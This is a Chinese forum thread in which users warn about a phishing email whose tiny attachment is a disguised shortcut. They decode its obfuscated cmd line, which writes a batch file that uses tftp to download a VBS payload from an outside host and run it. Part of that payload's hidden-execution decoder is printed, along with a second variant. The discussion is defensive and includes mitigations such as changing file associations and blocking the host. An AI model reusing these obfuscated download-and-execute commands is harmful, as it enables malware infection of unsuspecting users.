剛收到的信件附加檔覺得很可疑!

uason · 08:58 AM

他附加檔很小.
只有1K.
解壓縮後是一個類似捷徑的圖示.
執行指令如下.

語法:

%CoMsPEC% /C ecHo %M%%X%%M%P%A%%m%%x%%m%%X%%m%.NE%M%%a%gE%m%%A%%M%%a%F.Vbs>O.BAT&echo S%M%AR%M%%a%f.vBS>>o.BaT&SEt M=t&sEt x=f&SEt a= &O.bAT

也請各位網友多注意這種散播方式!

uason

解出來就是這樣：

語法:

%CoMsPEC% /C ecHo tftP tftft.NEt gEt t F.Vbs>O.BAT
echo StARt f.vBS>>o.BaT
o.bat

o.bat 的內容就會是這樣：

語法:

tftP tftft.NEt gEt t F.Vbs
StARt f.vBS

抓下來的 F.VBs 內容：

語法:

sub k
for i=1 to UBound(s)
r=r&chr(s(i)-823)
next
Set kk = CreateObject("Wscript.Shell") 
kk.run r,0
end sub
s=array(836,922 ... 中略 ... 942,870)
k

至於執行後有啥後果?
就要試試才知道了.

以上資料轉自三秒練功房

megakotaro

用這種方式來躲避防毒軟體已經流行一陣子了
只要連結還在，那麼下載的病毒就能不斷變種

天氣預報

ㄉㄌ不分是這類信的特徵

大灰芒果 · 01:10 PM

我的Hotmail信箱也從在線上遊戲認識不久的網友那收到了類似的東西，問她有沒有寄，他說沒有。

以下是信件內容，這些人想必跟盜帳號還有詐騙集團有牽連，希望牠們趕快被抓去關。(附上病毒檔案, 請小心取用; 下載後檔名是: _玩笑.zip_, 我只改了檔名)
===================================================

♂∵▼我把你的照片拼裝成這樣拉↖×⊙‏
寄件者： X X ([email protected])
寄件日期： 2009年11月25日上午 05:56:12
收件者： [email protected]

附件： 1 個附件
玩笑.zip (1.1 KB)

只是和你開個玩笑而已
我把你的照片拼裝成這樣拉,看看,是不是粉有意思,不過你可不要生氣
我只是跟你開個玩笑而已!!!不過很好玩

∵∴◇←◆××◇▽↖↑∵∵▼▽▽◆﹥◇←↖■▽→▽﹦↓←◇﹥

merlinhk

它是會不斷更新的，我朋友的電腦中了此毒，第一次他電腦傳給我類似的電郵，防毒掃了沒有反應；

第二次傳來，電郵主旨內容都不同，但是附件都是1.1k大小，防毒開始認到它是病毒；

今天，第三次傳來，電郵主旨內容又改了，但是附件都是1.1k大小，可惜的是，防毒又掃不到了，所以說此毒會自動更新的

大灰芒果 · 01:19 PM

引用:

%COmsPec% /C EChO %d%Tp%N%%d%%D%T.neT%n%GEt%n%T%N%W.Vbs>b.BAT
&ecHO START%N%w.VBS>>B.BAT&sEt d=tF&seT n= &B.BAt

我不會解碼

，以上是它的命令列參數，看起來跟發文大收到的木馬檔是同一系列。

附圖：它故意把自己的圖示弄成文字檔的，開啟後會自動縮小視窗執行以上指令。

tvirus · 01:35 PM

引用:

作者: 大灰芒果

我不會解碼

，以上是它的命令列參數，看起來跟發文大收到的木馬檔是同一系列。

附圖：它故意把自己的圖示弄成文字檔的，開啟後會自動縮小視窗執行以上指令。

語法:

%COmsPec% /C EChO %d%Tp%N%%d%%D%T.neT%n%GEt%n%T%N%W.Vbs>b.BAT
ecHO START%N%w.VBS>>B.BAT
sEt d=tF
seT n= 
B.BAt

解完

語法:

%COmsPec% /C EChO tFTp tFtFT.neT GEt T W.Vbs>b.BAT
ecHO START w.VBS>>B.BAT
B.BAt

b.bat內容就是...

語法:

tFTp tFtFT.neT GEt T W.Vbs
START w.VBS

基本上跟uason是差不多的
只是換個檔名而已

現在這種.lnk的,看到會膩了...
而且目前也少見相當多了,
大概大家都有因應的對付方法

FYI

請把BAT & CMD 預設關聯程式改成記事本, VBS 也比照辦理, 或是只改BAT & CMD, 反正這三種類型的程式用到的機會實在很低

uason

我已經在hosts增加一筆資料
127.0.0.1 tftft.NEt
暫時可以防止連上該站.
不過這種惡意網址以後可能會越來越多!

megakotaro 伊頭鬼作	回覆: 剛收到的信件附加欓覺得很可疑! 用這種方式來躲避防毒軟體已經流行一陣子了只要連結還在，那麼下載的病毒就能不斷變種
	回覆

天氣預報會員	回覆: 剛收到的信件附加欓覺得很可疑! ㄉㄌ不分是這類信的特徵
	回覆

FYI 會員	請把BAT & CMD 預設關聯程式改成記事本, VBS 也比照辦理, 或是只改BAT & CMD, 反正這三種類型的程式用到的機會實在很低
	回覆

uason 長工一號	回覆: 剛收到的信件附加檔覺得很可疑! 我已經在hosts增加一筆資料 127.0.0.1 tftft.NEt 暫時可以防止連上該站. 不過這種惡意網址以後可能會越來越多!
	回覆